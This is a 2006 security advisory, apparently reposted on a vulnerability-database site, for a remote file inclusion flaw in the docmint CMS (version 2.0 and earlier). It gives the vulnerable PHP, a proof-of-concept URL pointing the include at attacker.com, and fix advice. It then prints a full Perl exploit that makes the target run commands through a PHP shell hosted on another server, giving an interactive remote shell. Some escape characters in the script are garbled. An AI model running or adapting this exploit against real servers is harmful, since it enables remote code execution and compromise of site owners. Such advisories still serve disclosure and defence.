docmint <= 2.0 (MY_ENV[BASE_ENGINE_LOC]) Remote File Inclusion Vulnerability

Advisory Content :

ECHO_ADV_51$2006

------------------------------------------------------------------------
-----------------
[ECHO_ADV_51$2006] docmint <= 2.0 (MY_ENV[BASE_ENGINE_LOC]) Remote File
Inclusion Vulnerability
------------------------------------------------------------------------
-----------------

Author : M.Hasran Addahroni
Date : Oct, 9th 2006
Location : Australia, Sydney
Web : http://advisories.echo.or.id/adv/adv51-K-159-2006.txt
Critical Lvl : Dangerous
------------------------------------------------------------------------
---

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : docmint
version : <= 2.0
URL : http://www.docmint.net
Description :

Docmint is not a Wiki system. Docmint is a small,
multilingual CMS developed initially for online user manuals -
like the one you are looking at. It features user comments, full text
search,
templated and customizable front end layout with example skins, code
highlighting,
fully localizable admin and public interface, file upload and attachment,
image inclusion
in the articles, a tree structure for articles, an easy install script,
full Unicode-8
support as well as an import function from structured HTML documents,
topped with a WYSIWYSG editor in
the admin interface.
In short: Docmint was developed after an endless search for a simple
version of the beloved
functionality of the PHP.net website. The results you are looking at right
now, published under GNU/GPL.
Docmint has a number of XML import and export functionality for migrating
and backing up content as
well as language packs.
It currently also features the possibility of importing HTML documents
generated from OpenOffice or Word
into the database, using the level number of the header tags as the
underlying structure for the document tree

------------------------------------------------------------------------
---

Proof of Concept:
~~~~~~~~~~~~~~
Vulnerable Script engine/required.php .

---------------required.php--------------------------------
...
include_once "register_globals.php";

// one definite include so that we have the file functions for further
include loops
include_once($MY_ENV['BASE_ENGINE_LOC']."/lib"."/func.files.php");

//include_once all the php files in the core lib folder
$libfiles = get_files($MY_ENV['BASE_ENGINE_LOC']."/lib", "php"); // look
for php files in the lib folder
foreach ($libfiles as $libfile) {
$includefile = $MY_ENV['BASE_ENGINE_LOC']."/lib"."/$libfile";
include_once($includefile);
...
------------------------------------------------------------------

Variables $MY_ENV['BASE_ENGINE_LOC'] are not properly sanitized.
When register_globals=on and allow_fopenurl=on an attacker can exploit this
vulnerability with a simple php injection script.

Poc/Exploit:
~~~~~~~~~~

http://www.target.com/[docmint_path]/engine/require.php?MY_ENV[BASE_ENGI
NE_LOC]=http://attacker.com/evil?

Solution:
~~~~~~~

- Sanitize variable $MY_ENV['BASE_ENGINE_LOC'] on affected files.
- Turn off register_globals

Notification:
~~~~~~~~~~

vendor not contact yet

------------------------------------------------------------------------
---
Shoutz:
~~~~~
~ ping - my dearest wife, for all the luv the tears n the breath
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,negative,kaiten
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,bayl
aw
~ SinChan,x`shell,tety,sakitjiwa, m_beben, rizal, cR4SH3R, metalsploit,
x16
~ newbie_hacker (at) yahoogroups (dot) com [email concealed]
~ #aikmel #e-c-h-o @irc.dal.net

------------------------------------------------------------------------
---
Contact:
~~~~~~

K-159 || echo|staff || eufrato[at]gmail[dot]com
Homepage: http://k-159.echo.or.id/

-------------------------------- [ EOF ]
----------------------------------

Perl Exploit:
~~~~~~~~~~

#!/usr/bin/perl
##
# docmint <= 2.0 (MY_ENV[BASE_ENGINE_LOC]) Remote File Inclusion Exploit
# Bug Found & code By K-159
##
# echo.or.id (c) 2006
#
##
# usage:
# perl docmint.pl <target> <cmd shell location> <cmd shell variable>
#
# perl docmint.pl http://target.com/ http://site.com/cmd.txt cmd
#
# cmd shell example: <?passthru($_GET[cmd]);?>
#
# cmd shell variable: ($_GET[cmd]);
##
# #
#Greetz: My Dearest Wife - ping, echo|staff
(y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,negative),
SinChan, sakitjiwa, maSter-oP, mr_ny3m, bithedz, lieur-euy, x16,
mbahngarso, etc
#
# Contact: www.echo.or.id #e-c-h-o @irc.dal.net
##

use LWP::UserAgent;

$Path = $ARGV[0];
$Pathtocmd = $ARGV[1];
$cmdv = $ARGV[2];

if($Path!~/http:/// || $Pathtocmd!~/http:/// || !$cmdv){usage()}

head();

while()
{
print "[shell] $";
while(<STDIN>)
{
$cmd=$_;
chomp($cmd);

$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET
=>$Path.'engine/require.php?MY_ENV[BASE_ENGINE_LOC]='.$Pathtocmd.'?&'.$c
mdv.'='.$cmd)or die "nCould Not connectn";

$res = $xpl->request($req);
$return = $res->content;
$return =~ tr/[n]/[Ãƒ.Ã‚Âª]/;

if (!$cmd) {print "nPlease Enter a Commandnn"; $return ="";}

elsif ($return =~/failed to open stream: HTTP request failed!/ || $return
=~/: Cannot execute a blank command in <b>/)
{print "nCould Not Connect to cmd Host or Invalid Command
Variablen";exit}
elsif ($return =~/^<br./>.<b>Fatal.error/) {print "nInvalid Command or No
Returnnn"}

if($return =~ /(.*)/)

{
$finreturn = $1;
$finreturn=~ tr/[Ãƒ.Ã‚Âª]/[n]/;
print "rn$finreturnnr";
last;
}

else {print "[shell] $";}}}last;

sub head()
{
print
"n=====================================================================
=======rn";
print " *docmint <= 2.0 (MY_ENV[BASE_ENGINE_LOC]) Remote File Inclusion
Exploit*rn";
print
"=======================================================================
=====rn";
}
sub usage()
{
head();
print " Usage: perl docmint.pl <target> <cmd shell location> <cmd shell
variable>rnn";
print " <Site> - Full path to docmint ex: http://www.site.com/ rn";
print " <cmd shell> - Path to cmd Shell e.g
http://www.different-site.com/cmd.txt rn";
print " <cmd variable> - Command variable used in php shell rn";
print
"=======================================================================
=====rn";
print " Bug Found by K-159 rn";
print " www.echo.or.id #e-c-h-o irc.dal.net 2006 rn";
print
"=======================================================================
=====rn";
exit();
}

Security

IT News

Search

SecurityAlert Database

About SecurityAlert

ExploitAlert Database

SecurityReason Research

WLB Database

Send to WLB

About WLB

Security Audit

Schedule

Prices of services

Contact

SecurityReason IT News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Contact

About SecurityReason

docmint <= 2.0 (MY_ENV[BASE_ENGINE_LOC]) Remote File Inclusion Vulnerability